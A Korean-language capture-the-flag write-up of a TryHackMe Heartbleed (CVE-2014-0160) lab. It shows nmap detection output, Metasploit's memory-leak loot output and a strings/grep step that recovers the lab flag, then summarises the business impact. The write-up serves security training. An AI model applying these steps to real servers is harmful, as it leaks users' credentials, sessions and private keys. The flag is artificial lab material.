
이 프로젝트의 목표는 원격 호스트에 대해 Heartbleed 취약점(CVE-2014-0160)을 평가하고, 그 존재를 확인하며, TLS 프로토콜을 통해 서버 메모리에서 잠재적으로 민감한 정보를 추출하기 위해 이를 악용하는 것이었습니다.
목적 이 프로젝트의 목표는 원격 호스트에서 Heartbleed 취약점(CVE-2014-0160)을 평가하고, 존재 여부를 확인하며, TLS 프로토콜을 통해 서버 메모리에서 잠재적으로 민감한 정보를 추출하는 것이었습니다.
실행
plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7
| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 TLS 인증서는 자체 서명되어 있었고 만료되었습니다. 이로 인해 OpenSSL 버전이 오래되었을 가능성이 의심되었습니다. 대상 포트: 443.
plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 대상이 Heartbleed에 취약한 것으로 확인되었습니다.
plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin 메모리가 성공적으로 덤프되어 분석을 위해 로컬에 저장되었습니다.
strings openssl.heartble_152689.bin | grep -i "THM{" 결과:
plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} 애플리케이션 플래그를 포함한 기밀 데이터가 TLS 메모리에서 성공적으로 추출되어, 이 취약점이 실제로 악용되어 민감한 정보가 유출될 수 있음을 확인했습니다.
결론 원격 서버에서 CVE-2014-0160을 성공적으로 식별하고 익스플로잇했습니다. 프로세스는 다음과 같습니다:
nmap으로 취약점 감지
Metasploit을 사용한 결함 익스플로잇
메모리에서 실시간 사용자 제출 데이터(플래그 THM{sSl-Is-BaD} 포함) 추출
비즈니스 영향 공개된 시스템에 Heartbleed가 존재하는 것은 심각한 위험을 초래합니다:
TLS 개인 키 잠재적 유출
세션 하이재킹
사용자 이름, 이메일 및 민감한 사용자 입력 노출